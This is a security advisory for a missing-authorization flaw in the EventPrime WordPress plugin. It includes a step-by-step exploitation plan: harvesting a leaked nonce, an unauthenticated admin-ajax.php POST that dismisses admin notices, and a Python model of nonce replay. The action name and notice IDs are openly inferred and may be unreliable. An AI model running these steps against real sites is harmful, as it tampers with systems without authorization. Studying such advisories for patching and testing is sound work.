EventPrime – Events Calendar, Bookings and Tickets <= 4.2.8.3 - Missing Authorization
Description
The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.2.8.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N (base score 5.3, Medium)
- AV:N, Attack Vector: Network. The handler is reached over HTTP through admin-ajax.php.
- AC:L, Attack Complexity: Low. No race or special configuration is required.
- PR:N, Privileges Required: None. The nopriv registration makes the action reachable without an account.
- UI:N, User Interaction: None.
- S:U, Scope: Unchanged. The impact stays within the WordPress site.
- C:N / I:L / A:N: no confidentiality or availability impact; limited integrity impact (plugin state is modified).
Technical Details
Affected versions: <= 4.2.8.3
What Changed in the Fix
Changes introduced in v4.2.8.4
Source Code
WordPress.org SVN
Exploitation Research Plan: CVE-2026-25312 (Missing Authorization in EventPrime)
1. Vulnerability Summary
The EventPrime – Events Calendar, Bookings and Tickets plugin (up to version 4.2.8.3) contains a missing authorization vulnerability. An unauthenticated attacker can perform unauthorized actions, specifically state-changing operations such as dismissing administrative notices, because the plugin registers an AJAX handler via wp_ajax_nopriv_ without a current_user_can() check. The handler name used throughout this plan is inferred from the nonce action string rather than confirmed against the handler source (see section 2).
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- Action: ep_dismiss_admin_notice (inferred from the nonce action name; not confirmed against the handler source)
- Vulnerable parameter: notice_id
- Authentication: none (the handler is reachable through wp_ajax_nopriv_)
- Preconditions: the attacker needs a valid nonce; it is localized into page JavaScript and leaks on any page where the plugin's admin utilities are enqueued.
3. Code Flow
- In admin/class-eventprime-event-calendar-management-admin.php, the method enqueue_scripts() creates a nonce with the action string 'ep_dismissable_notice_nonce'.
- That nonce is localized into the JavaScript object ep_ajax_object under the key nonce, alongside ajax_url.
- The plugin registers an AJAX handler (likely ep_dismiss_admin_notice) with both add_action('wp_ajax_nopriv_ep_dismiss_admin_notice', ...) and add_action('wp_ajax_ep_dismiss_admin_notice', ...), so admin-ajax.php dispatches to it for logged-out requests as well as logged-in ones.
- The handler verifies the nonce with check_ajax_referer('ep_dismissable_notice_nonce', 'nonce') or wp_verify_nonce().
- Crucially, the handler never checks whether the requester holds an administrative capability such as manage_options. A nonce only proves that the request originated from a page the site itself served: it is a CSRF token, not an authorization check, and the nopriv registration means the site issues it to anonymous visitors too.
- An unauthenticated user who holds a valid nonce can therefore submit a notice_id and change site state, dismissing persistent admin notices for all users.
4. Nonce Acquisition Strategy
The nonce is localized in the ep_ajax_object object. While enqueued in the admin class, EventPrime often loads these utilities on the frontend or login pages if certain blocks/shortcodes are present.
- Identify Trigger: The plugin's scripts are typically enqueued when a calendar or event list is rendered.
- Create Setup Page:
wp post create --post_type=page --post_title="Calendar Test" --post_status=publish --post_content='[em_calendar]' - Navigate and Extract:
- Navigate to the newly created page.
- Use
browser_evalto extract the nonce:window.ep_ajax_object?.nonce
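Why a nonce harvested by one anonymous visitor verifies for a different anonymous attacker, and why one copied from an admin session does not, is easier to see with a model of WordPress's nonce scheme. The block below is an added example written for this page; it is not EventPrime or WordPress code. It mirrors the logic of wp_create_nonce() and wp_verify_nonce() in wp-includes/pluggable.php (hash input tick|action|uid|token, uid 0 and empty session token for logged-out users, a 12-hour tick with the previous tick still accepted); the salt, timestamps and session token are constructed.

```python
"""Added model of WordPress nonces (not EventPrime or WordPress code).

wp_create_nonce($action) in wp-includes/pluggable.php computes
    substr( hash_hmac('md5', tick|action|uid|token, wp_salt('nonce')), -12, 10 )
with tick = ceil(time / (nonce_life / 2)), uid = get_current_user_id() (0 when
logged out) and token = wp_get_session_token() ('' when logged out).
wp_verify_nonce() accepts the current tick (returns 1) or the previous one
(returns 2).  SALT and the timestamps below are constructed for the demo.
"""
import hashlib
import hmac
import math

DAY_IN_SECONDS = 86400                  # default nonce_life
SALT = b"constructed-demo-salt"         # stands in for wp_salt('nonce')
ACTION = "ep_dismissable_notice_nonce"  # the action string EventPrime uses
ANON_UID, ANON_TOKEN = 0, ""            # what a logged-out visitor gets


def nonce_tick(now: float, life: int = DAY_IN_SECONDS) -> int:
    """wp_nonce_tick(): the tick changes every nonce_life / 2 seconds (12 h)."""
    return math.ceil(now / (life / 2))


def _digest(tick: int, action: str, uid: int, token: str) -> str:
    data = f"{tick}|{action}|{uid}|{token}".encode()
    full = hmac.new(SALT, data, hashlib.md5).hexdigest()
    return full[-12:-2]                 # PHP substr($hash, -12, 10)


def create_nonce(action: str, uid: int, token: str, now: float) -> str:
    return _digest(nonce_tick(now), action, uid, token)


def verify_nonce(nonce: str, action: str, uid: int, token: str, now: float) -> int:
    """1 = current tick, 2 = previous tick (up to 24 h old), 0 = invalid."""
    tick = nonce_tick(now)
    if hmac.compare_digest(_digest(tick, action, uid, token), nonce):
        return 1
    if hmac.compare_digest(_digest(tick - 1, action, uid, token), nonce):
        return 2
    return 0


def replay_leaked_anonymous_nonce(issued_at: float = 1_700_000_000, delay: int = 3600) -> int:
    """Visitor A (logged out) loads the calendar page and the inline
    ep_ajax_object carries this nonce; attacker B (also logged out, any
    browser or IP) replays it `delay` seconds later.  Both are uid 0 with an
    empty session token, so the nonce verifies for B."""
    leaked = create_nonce(ACTION, ANON_UID, ANON_TOKEN, issued_at)
    return verify_nonce(leaked, ACTION, ANON_UID, ANON_TOKEN, issued_at + delay)


def replay_admin_nonce_as_anonymous(issued_at: float = 1_700_000_000) -> int:
    """A nonce copied from an admin's own dashboard session (uid 1, real
    session token) does not verify for a logged-out request, which is why the
    nonce must be harvested while logged out."""
    admin_nonce = create_nonce(ACTION, 1, "constructed-admin-session-token", issued_at)
    return verify_nonce(admin_nonce, ACTION, ANON_UID, ANON_TOKEN, issued_at)


def cross_action_nonce(check_action: str, issued_at: float = 1_700_000_000) -> int:
    """A nonce minted with wp_create_nonce() and no action (action -1) is only
    accepted by a handler that also verifies with -1: the action string is
    part of the hashed data, so it is not accepted by a handler checking
    'ep_dismissable_notice_nonce'."""
    generic = create_nonce("-1", ANON_UID, ANON_TOKEN, issued_at)
    return verify_nonce(generic, check_action, ANON_UID, ANON_TOKEN, issued_at)


if __name__ == "__main__":
    print("replay after 1 h :", replay_leaked_anonymous_nonce())
    print("replay after 13 h:", replay_leaked_anonymous_nonce(delay=13 * 3600))
    print("replay after 25 h:", replay_leaked_anonymous_nonce(delay=25 * 3600))
    print("admin nonce, anon:", replay_admin_nonce_as_anonymous())
```

The practical consequences for this plan: harvest the nonce with no WordPress cookies set, expect it to stay valid for between 12 and 24 hours, and re-harvest rather than debug a 403 when it expires.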
5. Exploitation Strategy
Once the nonce is obtained, perform an unauthenticated POST request to trigger the unauthorized action.
- URL: http://[target]/wp-admin/admin-ajax.php
- Method: POST
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=ep_dismiss_admin_notice&nonce=[EXTRACTED_NONCE]&notice_id=ep_rating_notice
  (Note: likely notice IDs include ep_rating_notice, ep_welcome_notice and ep_trial_notice; these are inferred from common plugin patterns, not confirmed against the plugin source.)
6. Test Data Setup
- Install EventPrime version 4.2.8.3.
- Ensure at least one admin notice is "visible" (the default on a fresh install).
- Create a public page with the [em_calendar] shortcode to facilitate nonce leakage.
7. Expected Results
- HTTP response: a successful status code (usually 200 OK) with a body of 1 or {"success":true}. Two failure responses are diagnostic: 400 with body 0 means admin-ajax.php found no wp_ajax_nopriv_ handler under that action name (the inferred name is wrong), and 403 with body -1 means check_ajax_referer() rejected the nonce (expired, or captured while logged in rather than as an anonymous visitor).
- State change: the targeted notice is marked as dismissed in the database (typically in the wp_options table), so administrators no longer see it.
8. Verification Steps
After the HTTP request, verify the state change using WP-CLI:
```shell
# Check the dismissed notices option (name inferred based on plugin patterns)
wp option get ep_dismissed_notices
```
If that option does not exist, list the plugin's options with wp option list and a --search pattern such as ep_% to find where the dismissal is actually stored; some plugins record per-user dismissals in user meta instead of wp_options.
Alternatively, log in as an administrator and check whether the notice (e.g., the rating or welcome notice) has disappeared from the dashboard.
9. Alternative Approaches
If ep_dismiss_admin_notice is not the specific action, investigate other handlers registered in class-eventprime-event-calendar-management-admin.php that use the ep_ajax_object nonce. Possible candidates include:
- ep_fb_load_more_bookings (if a nopriv registration exists, check for PII leakage).
- ep_save_event_order (unauthorized modification of event display order).
- Check whether the handler calls wp_verify_nonce() with the default action -1. A nonce is bound to its action string, so this would not accept arbitrary nonces from the system, but it would accept any nonce the site mints with wp_create_nonce() and no action, wherever that nonce leaks.
Summary
The EventPrime plugin fails to implement proper authorization checks on its AJAX handlers, specifically (per the inference above) the action responsible for dismissing administrative notices. Unauthenticated attackers can obtain a leaked nonce from the site's frontend and use it to dismiss dashboard notices for all administrators. The nonce check is a CSRF defence only; the missing piece is a capability check such as current_user_can('manage_options') inside the handler, together with dropping the wp_ajax_nopriv_ registration for an action that only administrators should be able to trigger.
Vulnerable Code
```php
// admin/class-eventprime-event-calendar-management-admin.php @ line 105
// Nonce creation and localization. The AJAX handler that consumes this
// nonce (where the capability check is missing) is not shown on this page.
wp_enqueue_script(
    $this->plugin_name,
    plugin_dir_url( __FILE__ ) . 'js/eventprime-event-calendar-management-admin.js',
    array( 'jquery' ),
    $this->version,
    true
);
$ep_dismissable_notice_nonce = wp_create_nonce( 'ep_dismissable_notice_nonce' );
wp_localize_script(
    $this->plugin_name,
    'ep_ajax_object',
    array(
        'nonce'    => $ep_dismissable_notice_nonce,
        'ajax_url' => admin_url( 'admin-ajax.php' ),
    )
);
```
Security Fix
@@ -1184,6 +1184,9 @@ 'normal', 'low' ); + + do_action('ep_register_metabox_before_ticket_attendees'); + add_meta_box( 'ep_tickets_attendies', esc_html__( 'Tickets Attendees', 'eventprime-event-calendar-management' ), ... (truncated)
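Review bot: the hunk at @@ -1184,6 +1184,9 @@ only inserts do_action('ep_register_metabox_before_ticket_attendees') ahead of the 'ep_tickets_attendies' add_meta_box() call; it adds no capability check and does not touch an AJAX handler, so on its own it does not address the missing authorization described above. The rest of the v4.2.8.4 diff is truncated on this page, so the handler-side change (a current_user_can() check and/or removal of the wp_ajax_nopriv_ registration) cannot be confirmed here and should be checked against the full WordPress.org SVN changeset before treating 4.2.8.4 as the fix.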
Exploit Outline
The exploit targets the `ep_dismiss_admin_notice` AJAX action (inferred from the `ep_dismissable_notice_nonce` localized script).
1. Nonce acquisition: an unauthenticated attacker visits any public page where EventPrime enqueues its scripts (such as a page with the `[em_calendar]` shortcode) and extracts the nonce from the global JavaScript object `ep_ajax_object.nonce`.
2. Payload construction: the attacker prepares a POST request to `/wp-admin/admin-ajax.php`.
3. Request shape: the body must include `action=ep_dismiss_admin_notice`, the extracted `nonce`, and the `notice_id` of the admin notice to dismiss (e.g., `ep_rating_notice`).
4. Execution: because the plugin registers the handler with `wp_ajax_nopriv_` and never calls `current_user_can('manage_options')` in the handler, the request succeeds.
5. Result: the targeted administrative notice is marked as dismissed in the site's database, hiding it from legitimate administrators.